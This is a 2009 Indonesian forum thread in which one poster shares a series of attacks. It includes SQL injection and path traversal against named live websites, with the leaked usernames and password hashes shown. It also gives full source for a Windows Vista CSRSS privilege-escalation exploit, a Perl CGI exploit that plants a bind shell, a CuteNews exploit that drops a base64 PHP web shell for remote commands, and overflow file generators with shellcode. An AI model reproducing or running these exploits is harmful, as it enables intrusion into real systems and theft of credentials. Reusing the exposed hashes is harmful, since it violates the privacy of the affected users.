
Kumpulan Bugs

Posted: Sun Jul 19, 2009 12:50 pm
by Digital Cat
CIA (Central Intelligence Agency)

Image
Web site CIA terdapat bugsnya..

pada halaman / link di CIA Search on http://www.cia.gov (Search the CIA Web Space)
bisa dilihat / dicoba pada gambar dan link dibawah ini ...

Image

Lihat Tampilan : >> Klik untuk melihat Tampilannya <<

Terima Kasih.....


Re: Kumpulan Bugs

Posted: Sun Jul 19, 2009 1:00 pm
by Digital Cat
Australian Temporary Tattoo Shop

Image

Lihat Tampilan : >> Klik untuk melihat Tampilannya <<

Kode :


UNION+SELECT+1,concat_ws(0x3a,username,user_password),3,4,5,6,7,8,9,10+from+tbluser--
Hasil :



harleygyoung:304011221bb6373bbfaff6b9ed9f5730

Ket :


Username :harleygyoung
Hash : 304011221bb6373bbfaff6b9ed9f5730
Terima Kasih.....


Re: Kumpulan Bugs

Posted: Sun Jul 19, 2009 1:35 pm
by Digital Cat
Bugs : CuteNews 1.4.5

Web Site : www.elprom-st.ru/blog/


Tampilan Login :

Image

Kode :


file.php?file=../users.db.php
Hasil :

Tampilan

Image

>> Klik untuk Mencoba <<

Hasil yang di dapat / download : users.db.php


<?PHP die("You don't have access to open this file !!!"); ?>
1213738930|1|Kty|4feff09ff463d728b9a4bc693146e6c7|Kty|[email protected]|1|0||1247808638||
1243237555|1|Evgenius|ee54fc17c198b85e98aedc110912ae70|||1|0||1244554956||
1247808679|1|Def|ce41ab87ba837da18cc3be5634bddd08|||0|0||||
Terima Kasih.....


Re: Kumpulan Bugs

Posted: Sun Jul 19, 2009 1:40 pm
by Digital Cat
Exploit Windows Vista

Simpan dengan format .c


Tes 1.c
#define offs1 0x30
#define offs2 0xBBD0
#include "windows.h"
#include "stdio.h"
DWORD(WINAPI*NtConnectPort)(PHANDLE,PWORD,
PSECURITY_QUALITY_OF_SERVICE,PDWORD,PDWORD,PDWORD, PVOID,
PDWORD);
DWORD(WINAPI*NtQueryInformationProcess)(HANDLE,DWO RD,PVOID,
DWORD,PDWORD);
DWORD(WINAPI*NtRaiseHardError)(DWORD,DWORD,DWORD,P VOID*,
DWORD,PDWORD);
HANDLE hl;
HANDLE hs;
DWORD sb;
LPVOID lpc(LPCWSTR w){//cesar trick
WORD n[4];
SECURITY_QUALITY_OF_SERVICE q;
LPVOID p;
DWORD d;
DWORD c[6],s[3];
BYTE b[0x28];
n[0]=n[1]=wcslen(w)*2;
*(PDWORD)(n+2)=(DWORD)w;
memset(&q,0,sizeof(q));
q.Length=sizeof(q);
p=NULL;
d=0x1000;
memset(&c,0,sizeof(c));
c[0]=sizeof(c);
memset(&s,0,sizeof(s));
s[0]=sizeof(s);
memset(&b,0,sizeof(b));
b[1]=1;
hs=CreateFileMapping(INVALID_HANDLE_VALUE,NULL,
PAGE_READWRITE,0,d,NULL);
if(!hs)return NULL;
p=MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0,0,0);
if(!p)return NULL;
c[1]=(DWORD)hs;
c[3]=d;
c[4]=(DWORD)p;
d=sizeof(b);
if(NtConnectPort(&hl,n,&q,c,s,NULL,&b,&d))
return NULL;
sb=c[5];
return p;
}

HANDLE e1,e11;
DWORD WINAPI tp1(LPVOID a){
LPVOID p[7];
DWORD d;
p[0]=p+3;
p[1]=p+5;
p[2]=0;
p[3]=(LPVOID)0x1B001AE;
p[4]=L"\\??\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA"
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA"
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA"
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ";
p[5]=(LPVOID)0x100010;
p[6]=L"erasmus1";
while(1){
WaitForSingleObject(e1,INFINITE);
NtRaiseHardError(0x40000018,3,3,p,0,&d);
SetEvent(e11);
}
return 0;
}

DWORD aaa,bbb;
HANDLE e2,e22;
DWORD WINAPI tp2(LPVOID a){
BYTE b[0xD8];
LPVOID p[7];
DWORD d;
memset(&b,0,sizeof(b));
*(PDWORD)(b+0x3C)=2;
*(PDWORD)(b+0x48)=1;
*(PDWORD)(b+0x4C)=1;
p[0]=p+3;
p[1]=p+5;
p[2]=0;
p[3]=(LPVOID)0xD600D6;
p[4]=&b;
p[5]=(LPVOID)0x100010;
p[6]=L"erasmus2";
while(1){
WaitForSingleObject(e2,INFINITE);
memcpy(&b,"C:\\TEST",8);
*(PDWORD)(b+0x08)=aaa;
*(PDWORD)(b+0x0C)=bbb;
*(PDWORD)(b+0x70)=aaa+0x100;
*(PDWORD)(b+0x74)=aaa+0x100;
NtRaiseHardError(0x40000018,3,3,p,0,&d);
SetEvent(e22);
}
return 0;
}

STARTUPINFO cps;
PROCESS_INFORMATION cpi;
void w(DWORD a,DWORD d){
HWND h;
aaa=d;
bbb=a;
SetEvent(e1);
do{h=FindWindow(NULL,"erasmus1");}while(!h);
CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NU LL,&cps,
&cpi);
Sleep(100);
SendMessage(h,WM_CLOSE,0,0);
Sleep(100);
SetEvent(e2);
do{h=FindWindow(NULL,"erasmus2");}while(!h);
TerminateThread(cpi.hThread,0);
Sleep(100);
CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NU LL,&cps,
&cpi);
Sleep(100);
SendMessage(h,WM_CLOSE,0,0);
Sleep(100);
}

int main(int c,char**v){
char sd[MAX_PATH];
char dp[MAX_PATH];
WCHAR pp[MAX_PATH];
WCHAR pn[MAX_PATH];
HMODULE nt,kr,ad;
DWORD se,cs,ws,u,d,h;
HANDLE t;
LPBYTE sc;
GetSystemDirectory(sd,sizeof(sd));
sprintf(dp,"%s\\csrsrv.dll",sd);
cs=(DWORD)LoadLibrary(dp);
sprintf(dp,"%s\\winsrv.dll",sd);
ws=(DWORD)LoadLibrary(dp);
sprintf(dp,"%s\\ntdll.dll",sd);
nt=LoadLibrary(dp);
sprintf(dp,"%s\\kernel32.dll",sd);
kr=LoadLibrary(dp);
sprintf(dp,"%s\\advapi32.dll",sd);
ad=LoadLibrary(dp);
*(LPVOID*)&NtConnectPort=GetProcAddress(nt,"NtConn ectPort");
*(LPVOID*)&NtQueryInformationProcess=GetProcAddres s(nt,
"NtQueryInformationProcess");
*(LPVOID*)&NtRaiseHardError=GetProcAddress(nt,
"NtRaiseHardError");
if(2==c){
d=atoi(v[1]);
if(!d){
printf("no args need\n");
return -1;
}
t=OpenProcess(PROCESS_ALL_ACCESS,0,d);
if(!t){
printf("no args need\n");
return -1;
}
__asm mov eax,fs:[0x18]
__asm mov eax,[eax+0x30]
__asm mov eax,[eax+0x1D4]
__asm mov se,eax
if(se)swprintf(pp,L"\\Sessions\\%d\\Windows",se);
else swprintf(pp,L"\\Windows");
swprintf(pn,L"%s\\ApiPort",pp);
sc=(LPBYTE)lpc(pn);
swprintf(pn,L"%s\\SbApiPort",pp);
if(!sc)sc=(LPBYTE)lpc(pn);
if(!sc)return -1;
h=0;
DuplicateHandle(GetCurrentProcess(),hs,t,(LPHANDLE )&h,0,0,2);
WriteProcessMemory(t,&hs,&h,4,&d);
WriteProcessMemory(t,&sb,&sb,4,&d);
Sleep(INFINITE);
}else{
STARTUPINFO cps;
PROCESS_INFORMATION cpi;
hs=sc=NULL;
sb=0;
memset(&cps,0,sizeof(cps));
cps.cb=sizeof(cps);
cps.dwFlags=STARTF_USESHOWWINDOW;
sprintf(sd,"\"%s\" %d",v[0],GetCurrentProcessId());
if(!CreateProcess(NULL,sd,NULL,NULL,0,
CREATE_NEW_PROCESS_GROUP|CREATE_NEW_CONSOLE,NULL,N ULL,&cps,
&cpi)){
printf("spawn fail\n");
return -1;
}
Sleep(3000);
if(!hs){
printf("lpc fail\n");
return -1;
}
sc=(LPBYTE)MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0, 0,0);
}
memset(&cps,0,sizeof(cps));
cps.cb=sizeof(cps);
cps.dwFlags=STARTF_USESHOWWINDOW;
e1=CreateEvent(NULL,0,0,NULL);
e11=CreateEvent(NULL,0,0,NULL);
CreateThread(NULL,0,tp1,NULL,0,NULL);
e2=CreateEvent(NULL,0,0,NULL);
e22=CreateEvent(NULL,0,0,NULL);
CreateThread(NULL,0,tp2,NULL,0,NULL);
u=cs+offs2;
*(PDWORD)(sc+offs1)=(DWORD)GetProcAddress(kr,"Load LibraryA");
w(u,sb);
Sleep(INFINITE);
return 0;
}



//tes 2.c
#define offs1 0x5F89
#define offs2 0xBBD0
#define offs3 0xBBFC
#define offs4 0x3F0CC
#include "windows.h"
LONG WINAPI uef(LPEXCEPTION_POINTERS a){
Sleep(INFINITE);
return 0;
}

DWORD WINAPI tp(LPVOID a){
HMODULE kr,ws;
BYTE b[0x100];
DWORD c,d;
HANDLE h,t;
kr=GetModuleHandle("kernel32");
ws=GetModuleHandle("winsrv");
h=OpenProcess(PROCESS_ALL_ACCESS,0,*(LPDWORD)((DWO RD)ws+offs4));
c=(DWORD)VirtualAllocEx((HANDLE)h,NULL,sizeof(b),M EM_COMMIT,PAGE_EXE
CUTE_READWRITE);
d=(DWORD)GetProcAddress(kr,"CreateProcessA")-(c+69);
memcpy(b,"\x33\xC0\x50\x50\x50\x50\x50\x50\x50\x50 \x50\x50\x50\x50\x
50\x50\xE8\x10\x00\x00\x00\x57\x69\x6E\x53\x74\x61 \x30\x5C\x44\x65\x
66\x61\x75\x6C\x74\x00\x50\x6A\x44\x8B\xCC\x68\x63 \x6D\x64\x00\x50\x
50\x50\x50\x54\x51\x50\x50\x50\x50\x50\x50\x83\xC1 \xFC\x51\x50\xE8\x
00\x00\x00\x00\x83\xC4\x58\xC3",73);
*(LPDWORD)(b+65)=d;
WriteProcessMemory((HANDLE)h,(LPVOID)c,b,sizeof(b) ,&d);
t=CreateRemoteThread((HANDLE)h,NULL,0,(LPTHREAD_ST ART_ROUTINE)c,NULL
,0,NULL);
WaitForSingleObject(t,INFINITE);
return 0;
}

BOOL WINAPI DllMain(HANDLE a,DWORD dwReason,LPVOID c){
DWORD cs,d;
LPDWORD p,f,l;
HANDLE h;
if(DLL_PROCESS_ATTACH==dwReason){
SetUnhandledExceptionFilter(uef);
h=CreateFile("C:\\OWNED.TXT",GENERIC_WRITE,0,NULL,
CREATE_ALWAYS,FILE_FLAG_WRITE_THROUGH,NULL);
WriteFile(h,"greetz from csrss!\r\n",20,&d,NULL);
CloseHandle(h);
cs=(DWORD)GetModuleHandle("csrsrv");
*(LPDWORD)(cs+offs2)=0;
__asm mov eax,esp
__asm mov p,eax
while(1){
if(cs+offs1==*p){
*p=(DWORD)ExitThread;
d=p[1]+8;
break;
}
p=p+1;
}
p=*(LPDWORD*)(cs+offs3)+2;
f=p;
while(d!=f[0])f=*(LPDWORD*)f;
l=p;
while(d!=l[1])l=*(LPDWORD*)(l+1);
*(LPDWORD*)f=l;
*(LPDWORD*)(l+1)=f;
for(d=0;d<100;d=d+1){
p=(LPDWORD)HeapAlloc(GetProcessHeap(),0,0xD8);
memset(p,0,0xD8);
p[2]=(DWORD)p+0x08;
p[3]=(DWORD)p+0x08;
p[4]=(DWORD)p+0x10;
p[5]=(DWORD)p+0x10;
p[13]=0x240000;
p[15]=1;
p[16]=1;
p[28]=(DWORD)p+0x78;
p[29]=(DWORD)p+0x80;
}
p=(LPDWORD)GetProcessHeap();
while(1){
p=p+1;
if(0x60005==*p&&p[1]>(DWORD)p&&p[1]<(DWORD)p+0x100&&
!strcmp(*(LPSTR*)(p+1),"CSRSS")){
d=p[1]+6;
while(1){
p=p-1;
if(d-(DWORD)p==*p)break;
}
break;
}
}
*(LPDWORD*)(cs+offs2)=p;
Sleep(0);
CreateThread(NULL,0,tp,NULL,0,NULL);
}
return TRUE;
}
Pembuat Program : [email protected]

Terima Kasih.....


Re: Kumpulan Bugs

Posted: Sun Jul 19, 2009 5:28 pm
by vodork
wew menakutkan :twisted: :twisted:

Re: Kumpulan Bugs

Posted: Sun Jul 19, 2009 6:17 pm
by Digital Cat
Exploit Mailing List & News Version 1.7

Mailing List & News
Version = Version 1.7


#!/usr/bin/perl -w
use strict; use Socket;

if (@ARGV < 1) {
    print("Usage: $0 <target>\n");
    exit(1);
}

my($target,$agent,$cgicode,$cgicode,$code,
   $iaddr,$paddr,$proto);

$target = $ARGV[0];
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/maillist.cgi\n");

$code =
"POST /cgi-bin/maillist.cgi HTTP/1.0
Connection: Keep-Alive
User-Agent: $agent
Host: $target
Content-type: application/x-www
Content-length: 160

";

$cgicode =


"\x65\x6d\x61\x69\x6c\x3d\x68\x61\x73\x73\x40\x2b\x26".
"\x65\x63\x68\x6f\x2b\x27\x66\x69\x64\x6f\x2b\x73\x74".
"\x72\x65\x61\x6d\x2b\x74\x63\x70\x2b\x6e\x6f\x77\x61".
"\x69\x74\x2b\x6e\x6f\x62\x6f\x64\x79\x2b\x2f\x62\x69".
"\x6e\x2f\x62\x61\x73\x68\x2b\x62\x61\x73\x68\x2b\x2d".
"\x69\x27\x2b\x3e\x2b\x2f\x74\x6d\x70\x2f\x2e\x68\x61".
"\x73\x73\x3b\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f".
"\x69\x6e\x65\x74\x64\x2b\x2f\x74\x6d\x70\x2f\x2e\x68".
"\x61\x73\x73\x26\x42\x31\x3d\x4f\x4b\x26\x61\x63\x74".
"\x69\x6f\x6e\x3d\x73\x75\x62\x73\x63\x72\x69\x62\x65";

$cgicodeb =
"subject=teleh0rz+cgi+warez&message=hass";

send_code();
print("\nSleeping 5 seconds - waiting for the shell ...\n\n");
sleep(5); system("nc -w 10 $target 60179"); exit(0);

sub send_code {
    connect_host();
    send(SOCKET,"$code$cgicode\015\012", 0);
    close(SOCKET); connect_host();
    send(SOCKET,"$code$cgicode\015\012", 0);
    close(SOCKET);
}

sub connect_host {
    $iaddr = inet_aton($target);
    $paddr = sockaddr_in(80, $iaddr);
    $proto = getprotobyname('tcp');
    
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
    connect(SOCKET, $paddr);
}

Terima Kasih...



Re: Kumpulan Bugs

Posted: Sun Jul 19, 2009 6:31 pm
by Digital Cat
OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit


nops = "\x90" * 4
ret = "\x75\x52\x46"; # call ebx

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\xc9"
"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\ xc9\x2c\x42\x05"
"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\ xe9\x2d\x22\x09"
"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\ xce\xed\x03\x4d"
"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\ xed\x2d\x22\x26"
"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\ x22\xa5\x95\x64"
"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\ x42\x6c\xc5\xcb"
"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\ xc9\x2c\x42\x28"
"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\ xa1\xdc\x43\x44"
"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\ xaa\x02\xac\x38"
"\xac\x2c\xc9\x40"
)
num = 276 - 4 - 160
buff = "\x41" * num

exploit = nops + shellcode + buff + ret
try:
out_file = open("open_me.ofl",'w')
out_file.write(exploit)
out_file.close()
raw_input("\nNow open open_me.ofl file to exploit bug!\n")
except:
print "WTF?"
Terima Kasih...



Re: Kumpulan Bugs

Posted: Sun Jul 19, 2009 6:41 pm
by Digital Cat
CuteNews <= 1.4.6 - XSS / Remote Command Execution Exploit


#!/usr/bin/php -q
<?php
error_reporting(0);

list($cli,$host,$path,$username,$password) = $argv;

if ($argc != 5) {

print "\n+-------------------------------------------------------------+\n";
print "\r| CuteNews <= 1.4.6 - Remote Command Execution Exploit |\n";
print "\rUsage: php xpl.php [host] [path] [username] [password]\n\n";
print "\rhost + localhost\n";
print "\rpath + /cutenews\n";
print "\rusername + admin username\n";
print "\rpassword + admin password\n\n";
exit;
}

exploit();

function login () {

global $username,$password;

$cookies .= "username={$username}; md5_password=";
$cookies .= md5($password);

return $cookies;
}


function check_login() {

global $host,$path;

$auth .= login();

$data .= "GET /{$path}/index.php HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Cookie: $auth;\n";
$data .= "Connection: close\r\n\r\n";

if (preg_match('/Welcome/i',$data)) {
return true;
}
else {
die("Login Failed\n");
}
}


function exploit() {

global $host,$path;

$login = login();
$shell = "PD9waHAgDQpwYXNzdGhydSgkX0dFVFsnYyddKTsgDQo/Pg==";

$shell = base64_decode($shell);
$post = "add_ip={$shell}&action=add&mod=ipban";

$data .= "POST /{$path}/index.php HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Cookie: $login\r\n";
$data .= "Referer: http://{$host}/{$path}/index.php\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($post)."\r\n\r\n";
$data .= "{$post}\r\n\r\n";

if (eregi('passthru',data_send($host,$data))) {
yeat_shell();
}
else {
die("Exploit Failed!\n");
}
}


function yeat_shell() {

while (1) {
echo "yeat[shell]~$: ";
$exec = stripslashes(trim(fgets(STDIN)));

if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n");
if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n");
if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n");

print data_exec($exec);
}
}


function data_exec($exec) {

global $host,$path;

$exec = urlencode($exec);
$data .= "GET /{$path}/data/ipban.db.php?c={$exec} HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Connection: close\r\n\r\n";

$html = data_send ($host,$data);
$html = str_replace('|0||',null,$html);
return $html;
}


function data_send ($host,$data) {

if (!$sock = @fsockopen($host,80)) {
die("Connection refused,try again!\n");
} fputs($sock,$data);

while (!feof($sock)) { $html .= fgets($sock); }

fclose($sock);
return $html;
}
Kode :
Email : [email protected]

Terima Kasih...



Re: Kumpulan Bugs

Posted: Sun Jul 19, 2009 7:02 pm
by Digital Cat
Buffer overflow Software - Browse3D v3.5 (.sfs)

Download Software :

>> Klik untuk download <<


#!/usr/bin/perl -w
# create file exploit > open it >
# Error : Access violation at 0x41414141 ( tried to read from 0x41414141 ), program terminated.
my $adresse = "AAAA" ;
my $nop = "\x90" x 261;

my $file = "Houssamix.sfs";
$exploit = $nop.$adresse;

open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;


close($FILE);
print "$file has been created open it with Browse3D v 3.5\n";
Terima Kasih...

